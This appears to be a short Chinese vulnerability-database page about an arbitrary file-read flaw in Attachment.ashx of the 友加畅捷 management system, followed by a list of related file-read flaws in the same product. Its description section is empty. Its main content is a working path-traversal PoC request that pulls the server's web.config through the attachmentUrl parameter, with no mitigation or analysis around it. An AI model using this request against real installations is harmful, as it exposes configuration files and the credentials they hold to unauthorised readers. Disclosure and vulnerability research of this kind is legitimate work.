友加畅捷管理系统 Attachment.ashx 存在文件读取漏洞

漏洞描述

PoC代码

GET /Controllers/ajax/Attachment.ashx?attachmentUrl=../../web.config HTTP/1.1

相关漏洞推荐

• 友加畅捷管理系统 downloadfile.ashx 任意文件读取漏洞
• 友加畅捷管理系统 RepFile.ashx 任意文件读取漏洞
• 友加畅捷管理系统 /ReportDesign/RepFile.ashx 文件读取漏洞
• 友加畅捷管理系统 Attachment.ashx 任意文件读取漏洞
• 友加畅捷管理系统 RepFile.ashx 存在文件读取漏洞
• 友加畅捷管理系统 downloadfile.ashx 存在文件读取漏洞